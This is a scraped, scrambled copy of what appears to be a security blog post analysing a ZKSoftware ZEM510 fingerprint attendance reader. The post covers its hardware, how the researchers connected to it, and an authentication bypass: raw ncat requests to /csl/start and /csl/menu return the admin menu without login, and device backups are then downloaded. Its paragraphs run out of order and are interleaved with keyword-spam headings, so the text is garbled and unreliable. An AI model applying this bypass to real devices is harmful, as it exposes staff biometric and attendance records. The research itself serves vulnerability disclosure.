- #ZK SOFTWARE TIME ATTENDANCE DOWNLOAD SERIAL#
- #ZK SOFTWARE TIME ATTENDANCE DOWNLOAD UPDATE#
- #ZK SOFTWARE TIME ATTENDANCE DOWNLOAD MANUAL#
Peeking around we found that most of the files were illegible or empty, and decided to continue with the next gzipped file before going further. mnt/mtdblock/data: extlog.dat template.dat transaction.dat mnt/mtdblock: custattstate.dat custvoice.dat data/ dpmidx.dat extlog.dat extuser.dat oplog.dat sms.dat udata.dat user.dat workcode.dat. They are both gzipped, let’s extract them.
For this post we’re leaving web vulnerabilities aside and instead we’ll discuss just one major one, you’ll see why soon.ĭownloading backup system data example.Showing downloaded files: file * data.dat: gzip compressed data, max compression, from Unix device.dat: gzip compressed data, max compression, from Unix Now that we completely control the web interface, we started looking for vulnerabilities that could lead to access to the linux that’s running below. The only difference would be that the anon user has to access menu directly and the admin can make use of their fantastic “Web 3.0” login. We can conclude either an anonymous user or an administrator have the same privileges on the website, making session handling utterly useless. If the login page had a destroy session or something alike it would be considered a CSRF, which in this case, supposing that sessions were handled “properly”, meant the only “security” administrators had, but no, not even that. Response shows menu content loaded completely, and to make it even better you can see how bad they are handling sessions: the ‘Login off’ option is nothing more than a call to a JavaScript function that takes you to the login page.
#ZK SOFTWARE TIME ATTENDANCE DOWNLOAD UPDATE#
Accessing /csl/menu (stripped content for clarity): ncat zkwebserver 80 GET /csl/menu HTTP/1.1 Host: zkwebserver HTTP/1.0 200 OK Server: ZK Web Server Pragma: no-cache Cache-control: no-cache Content-Type: text/html Connection: close Terminal javascript:oncwx() -> Login Off /csl/desktop -> Dev Status User Report /csl/report -> Report /csl/query -> Query /form/RealTime -> Monitor User Administration /csl/dpm -> Department /csl/user -> User /csl/user?action=add -> Add User Setting /form/Device?act=5 -> TCP/IP /form/Device?act=17 -> WIFI Setting /form/Device?act=3 -> Date/Time /form/Device?act=7 -> Change Password Terminal /form/Device?act=11 -> Backup /form/Device?act=14 -> Restore /form/Device?act=12 -> Update /csl/download -> Download /form/Device -> Reboot So far we can't state for sure that calling /csl/menu directly will have the same effect. You can see that the web server replied with 200 OK and tried to load in framesets /csl/menu, /csl/desktop and /csl/header without asking for an auth. Accessing /csl/start: ncat zkwebserver 80 GET /csl/start HTTP/1.1 Host: zkwebserver HTTP/1.0 200 OK Server: ZK Web Server Pragma: no-cache Cache-control: no-cache Content-Type: text/html Connection: close Let’s see the requests in plaintext with ncat so you understand the gravity of the situation. Showing empty cookie on console on start.csl And we’re in. Port 23 seems to be a telnet service, we check if it’s legitimate: Interesting ports, let’s dig up a little more.
#ZK SOFTWARE TIME ATTENDANCE DOWNLOAD SERIAL#
We tried serial communication via USB, which creates a virtual serial port, using miniterm and screen, synchronizing the recommended baud rates and rebooting the device in order to expect some kind of prompt or output, but nothing came out of it :( Ethernet connection via UTP CableĪfter noticing that the network interface by default sets its IP address to 192.168.1.201 and has an access restriction by IP, we found out that setting our local one to 192.168.1.220 would do the trick. Looking for a way to communicate! Serial connection via USB Power supply: 12v, 1,5A and a 4hs additional battery.Reader: EM Marin125 khz, Protocol: Wiegand 26.Between the principal characteristics there are a few to highlight:
#ZK SOFTWARE TIME ATTENDANCE DOWNLOAD MANUAL#
Downloads and user manual also available. In their official websites you can find a detailed documentation about it. It’s a bio-metric fingerprint reader that’s supposed to provide controlled entrance of personnel and security to facilities. It’s made by ZKSoftware, which happens to have a reseller here, in Argentina. The specific name of the device is ZK-I01A ID GPRS, also known as ZEM510 and costs approximately U$200. at the back, there is a little tamper switch that will detect when the device is detached from the wall, and will trigger the alarm mode.Back view of the ZEM510 fingerprint reader.On plain sight we can find:
0 kommentar(er)
